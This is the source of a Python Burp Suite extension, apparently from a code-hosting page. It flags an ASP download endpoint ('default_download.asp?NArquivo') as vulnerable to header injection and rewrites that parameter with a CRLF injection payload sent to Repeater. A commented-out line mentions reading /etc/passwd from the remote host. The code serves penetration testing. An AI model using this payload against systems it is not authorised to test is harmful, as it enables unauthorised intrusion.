/
headerinjection.py
151 lines (121 loc) · 5.48 KB
/
headerinjection.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
from burp import IBurpExtender
from burp import IScannerCheck
from burp import IScanIssue
from burp import IHttpListener
from burp import IContextMenuFactory
from burp import IParameter
from javax.swing import JMenuItem
from javax.swing import JOptionPane
from javax.swing import JFrame
from java.util import List, ArrayList
PAYLOAD = "aaa%0d%0aHeader:+Injection%0d%0aHueHue:+HueHue%0d%0a"
ISSUE = "ASP Header Injection"
SEVERITY = "High"
ISSUE_DETAIL = "This vulnerability allows an attacker to "\
"exploit Header Injectiono on remote host."
PUBLISH_ISSUE = "CustomScanIssue(currentMessage.getHttpService()"\
",self._helpers.analyzeRequest(currentMessage)"\
".getUrl(),[self._callbacks.applyMarkers"\
"(currentMessage, None, None)]"\
",\"{0}\",\"{1}\",\"{2}\")".format(ISSUE,
ISSUE_DETAIL,
SEVERITY)
class BurpExtender(IBurpExtender, IHttpListener,
IScannerCheck, IContextMenuFactory,
IParameter):
def banner(self):
print "Successfully loaded Header Injection - v0.1"
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
self.context = None
self._callbacks.setExtensionName("Header Injection Exploiter")
callbacks.registerHttpListener(self)
callbacks.registerScannerCheck(self)
callbacks.registerContextMenuFactory(self)
self.banner()
def createMenuItems(self, context_menu):
self.context = context_menu
menu_list = ArrayList()
menu_list.add(JMenuItem("Send to Header Injection Exploiter",
actionPerformed=self.setPayload))
return menu_list
def setPayload(self, event):
proto = 0
httpRequestResponse = self.context.getSelectedMessages()
for currentRequest in httpRequestResponse:
#parentFrame = JFrame()
#cmd = JOptionPane.showInputDialog(parentFrame,
# "File path to read from remote host. Ex:/etc/passwd")
headers = list(self._helpers.analyzeRequest(currentRequest).
getHeaders())
newMessage = self._helpers.buildHttpMessage(headers, None)
if currentRequest.getHttpService().getProtocol() == 'https':
proto = 1
hp = str(self._helpers.analyzeRequest(
currentRequest.getRequest()).getHeaders())
for p in self._helpers.analyzeRequest(currentRequest.getRequest()).getParameters():
if p.getName() in hp:
if 'NArquivo' in p.getName():
newParam = self._helpers.buildParameter(p.getName(),PAYLOAD,
IParameter.PARAM_URL)
newMessage = self._helpers.updateParameter(newMessage, newParam)
else:
newParam = self._helpers.buildParameter(p.getName(),p.getValue(),
IParameter.PARAM_URL)
newMessage = self._helpers.updateParameter(newMessage, newParam)
self._callbacks.sendToRepeater(currentRequest.getHttpService().getHost(),
currentRequest.getHttpService().getPort(),
proto, newMessage, None)
def processHttpMessage(self, toolFlag, messageIsRequest, currentMessage):
if not messageIsRequest:
return
if toolFlag == 8:
if self.validate_file_extensions(currentMessage):
issue = eval(PUBLISH_ISSUE)
self._callbacks.addScanIssue(issue)
def doPassiveScan(self, currentMessage):
if self.validate_file_extensions(currentMessage):
return [eval(PUBLISH_ISSUE)]
def consolidateDuplicateIssues(self, existingIssue, newIssue):
if (existingIssue.getIssueName() == newIssue.getIssueName()):
return -1
else:
return 0
def validate_file_extensions(self, currentMessage):
url = str(self._helpers.analyzeRequest(currentMessage).getUrl())
if 'default_download.asp?NArquivo' in url.split('/')[-1]:
return 1
return 0
class CustomScanIssue(IScanIssue):
def __init__(self, httpService, url, httpMessages, name, detail, severity):
self._httpService = httpService
self._url = url
self._httpMessages = httpMessages
self._name = name
self._detail = detail + '<br/><br/><div style="font-size:8px">'\
'This issue was reported by Header '\
'Injection Extension</div>'
self._severity = severity
def getUrl(self):
return self._url
def getIssueName(self):
return self._name
def getIssueType(self):
return 0
def getSeverity(self):
return self._severity
def getConfidence(self):
return "Certain"
def getIssueBackground(self):
pass
def getRemediationBackground(self):
pass
def getIssueDetail(self):
return self._detail
def getRemediationDetail(self):
pass
def getHttpMessages(self):
return self._httpMessages
def getHttpService(self):
return self._httpService